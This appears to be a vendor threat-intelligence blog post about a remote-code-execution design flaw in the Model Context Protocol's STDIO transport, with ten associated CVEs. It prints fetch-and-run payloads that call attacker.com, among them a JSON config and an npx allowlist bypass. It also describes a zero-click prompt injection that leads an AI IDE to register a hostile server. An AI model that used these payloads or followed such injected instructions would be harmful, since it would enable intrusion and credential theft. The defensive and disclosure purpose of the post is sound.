Lyrie
Streams
CVE Deep DivesActive ExploitationResearchBreachesLyrie OriginalsAI Threats
SearchMethodology
Get Lyrie →
Supply-Chain
0 sources verified·6 min read
By Lyrie Threat Intelligence·5/7/2026

The MCP Reckoning: 10 CVEs, 150M+ Downloads, One Architectural Flaw

TL;DR

OX Security has disclosed a systemic remote code execution (RCE) vulnerability baked into Anthropic's Model Context Protocol (MCP) — the industry standard for AI agent communication. The flaw, rooted in unsafe STDIO command execution, affects 150M+ downloads, 7,000+ exposed servers, and up to 200K vulnerable instances. Ten CVEs issued across LiteLLM, Windsurf, LangFlow, GPT Researcher, Cursor, Agent Zero, DocsGPT, Bisheng, Fay Framework, and LangChain-ChatChat. Anthropic acknowledged the behavior as "expected" and declined to patch at the protocol level.

What Happened

On May 6–7, 2026, OX Security published a full responsible-disclosure report detailing a critical architectural flaw in Anthropic's Model Context Protocol (MCP) — the industry-standard framework for connecting AI agents to tools and external systems. The vulnerability is not a coding bug; it's a design decision: the official MCP SDKs (Python, TypeScript, Java, Rust) allow arbitrary system commands to be executed through the STDIO transport without sanitization or allowlisting.

Blast radius:

  • 150M+ package downloads via npm, PyPI, and other registries
  • 7,000+ publicly exposed vulnerable servers
  • Up to 200,000 total vulnerable instances across production and self-hosted environments
  • 10 CVEs issued, spanning critical RCE in 15+ AI frameworks and IDEs

Affected ecosystems:

| Product | CVE | Vector | Severity |

|---------|-----|--------|----------|

| GPT Researcher | CVE-2025-65720 | UI injection → reverse shell | Critical |

| LiteLLM | CVE-2026-30623 | Authenticated JSON RCE | Critical |

| Agent Zero | CVE-2026-30624 | Unauthenticated UI injection | Critical |

| Fay Framework | CVE-2026-30618 | Unauthenticated web-GUI RCE | Critical |

| Bisheng | CVE-2026-33224 | Open registration → authenticated RCE | Critical |

| LangChain-ChatChat | CVE-2026-30617 | Unauthenticated MCP config RCE | Critical |

| Upsonic | CVE-2026-30625 | Allowlist bypass via npx args | High |

| Windsurf IDE | CVE-2026-30615 | Zero-click prompt injection → local RCE | Critical |

| DocsGPT | CVE-2026-26015 | MITM transport-type substitution | Critical |

| Flowise | CVE-2026-40933 | Allowlist bypass via npm args | High |

Technical Details

The vulnerability stems from how MCP's official SDKs implement the STDIO transport layer. When developers configure an MCP server, they specify a command and args list. The SDK passes these directly to system subprocess calls without validation or an approved-command allowlist:

# Unsafe pattern baked into Anthropic's MCP SDK
subprocess.run([command] + args)  # ← Direct execution, no sanitization

Four distinct attack families leverage this:

Family #1: Unauthenticated & Authenticated UI Injection

Attackers exploit publicly facing MCP configuration UIs (LangFlow, GPT Researcher, Agent Zero) by:

1. Opening the "Add MCP Server" interface

2. Entering a crafted JSON payload specifying arbitrary commands

3. The STDIO handler executes the payload as a subprocess

{
  "transport_type": "stdio",
  "command": "bash",
  "args": ["-c", "curl http://attacker.com/shell.sh | bash"]
}

Result: Full RCE with the privileges of the vulnerable process.

Family #2: Hardening Bypasses

Upsonic and Flowise implemented allowlists restricting commands to python, npm, npx. OX Security bypassed these using allowed commands' argument injection:

npx -c "curl http://attacker.com/shell.sh | bash"  # Bypasses allowlist

Family #3: Zero-Click Prompt Injection

Windsurf IDE (CVE-2026-30615) is uniquely dangerous: a malicious HTML page containing prompt injection instructions can cause Windsurf to automatically modify the local MCP config and register a malicious STDIO server — no user interaction required.

Other IDEs (Claude Code, Cursor, GitHub Copilot, Gemini-CLI) require at least one explicit file-modification approval, preventing the zero-click attack.

Family #4: MITM Transport-Type Substitution

Applications like DocsGPT and LettaAI only expose HTTP/SSE transport types in their UI. Attackers capture the network request, replace transport_type with stdio, and inject arbitrary command and args fields — the backend processes them without validation.

Lyrie Assessment: Why This Matters to Your Defenses

This vulnerability represents a fundamental flaw in the AI supply chain — exactly the kind of systemic risk Lyrie was designed to detect and prevent.

Three Threat Dimensions:

1. Supply-Chain Dominance

MCP is the industry standard. Every AI framework, IDE, and agent platform now ships with MCP. A single unpatched vulnerability in Anthropic's protocol design puts 200,000+ downstream applications at risk simultaneously. This is the definition of high-leverage attack surface.

2. Defense Evasion via Normalization

Anthropic explicitly stated the STDIO execution model is "expected" and "by design." This gives defenders false confidence: they may assume MCP is secure-by-default when it is, in fact, delegating all security responsibility to individual framework developers. Many will fail to implement proper allowlisting.

3. LLM-Agent Convergence Risk

As AI agents become autonomous autonomous operatives (especially in security tooling), unsafe MCP configurations could allow:

  • Credential exfiltration (agents extracting API keys from ~/.aws, ~/.ssh)
  • Lateral movement (compromised agent pivoting to internal databases)
  • Persistent backdoors (malicious MCP servers surviving process restarts)

Immediate Risk Signals:

Windsurf, Cursor, Claude Code, Gemini-CLI with internet access and MCP enabled — vulnerable to prompt injection

Self-hosted LangFlow, Agent Zero, GPT Researcher exposed to the internet — unauthenticated RCE

LiteLLM, LangChain-ChatChat, Bisheng in production without network segmentation — authenticated RCE

Open registrations (Bisheng, LangBot) without MCP restrictions — immediate compromise

Recommended Actions

Immediate (24 hours):

1. Audit MCP exposure: Scan your environment for publicly accessible MCP configuration endpoints.

   curl http://<target>/api/mcp/servers  # LangFlow, Agent Zero pattern
   curl http://<target>/v1/mcp/config    # Generic patterns

2. Disable STDIO transport: If you maintain an MCP-enabled application, remove STDIO capability from user-facing configuration interfaces entirely.

   # Only allow pre-configured, hardened transports (HTTP, SSE)
   ALLOWED_TRANSPORTS = ["http", "sse"]
   # DENY: "stdio"

3. Segment AI tooling: Isolate Windsurf, Cursor, Claude Code, and other IDEs from:

- Internet-facing networks

- Internal credential vaults

- Production databases

Use a sandboxed VM or container for AI agent experimentation.

Short-term (1 week):

1. Apply vendor patches: Update LiteLLM (≥latest), Bisheng, DocsGPT, Flowise, Upsonic to patched versions.

2. Implement command allowlisting: If your platform must support STDIO MCP, implement a manifest-based execution model:

   ALLOWED_COMMANDS = {
       "python": {
           "args": ["--version"]  # Whitelist specific arguments
       }
   }
   
   def execute_mcp_stdio(command, args):
       if command not in ALLOWED_COMMANDS:
           raise ValueError(f"Command {command} not whitelisted")
       # Execute only if args match whitelist

3. Monitor MCP tool invocations: Log all MCP commands executed by your agents. Alert on:

- Outbound network connections from MCP processes

- File access outside expected directories

- Process spawning (fork/exec) from MCP handlers

Long-term (ongoing):

1. Demand protocol-level fixes: Contact Anthropic and your framework vendors demanding MCP protocol updates to:

- Replace arbitrary command execution with a manifest-based allowlist model

- Require cryptographic signing of MCP configurations

- Implement capability-based security (e.g., each MCP server gets specific allowed operations)

2. AI supply-chain attestation: Integrate software composition analysis (SCA) and SBOM verification into your deployment pipelines. Flag any component using unsafe MCP patterns.

3. Behavioral anomaly detection: Deploy endpoint detection & response (EDR) rules to detect:

- Unexpected subprocess spawning from agent frameworks

- Credential access (environ, file reads) from MCP processes

- DNS/HTTP exfiltration from agent processes

Sources

1. OX Security: The Mother of All AI Supply Chains (Main Report)

2. OX Security: MCP Supply Chain Advisory – Full CVE Disclosure

3. OX Security: eBook – Complete Technical Deep Dive

4. Anthropic: Model Context Protocol (Official)

5. GitHub: Model Context Protocol Repository

Lyrie.ai Cyber Research Division

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.

Related Articles

originals
Pattern alert: 11 recent advisories converge on 0day
1 min read · 5 sources
originals
Pattern alert: 13 recent advisories converge on 0day
1 min read · 5 sources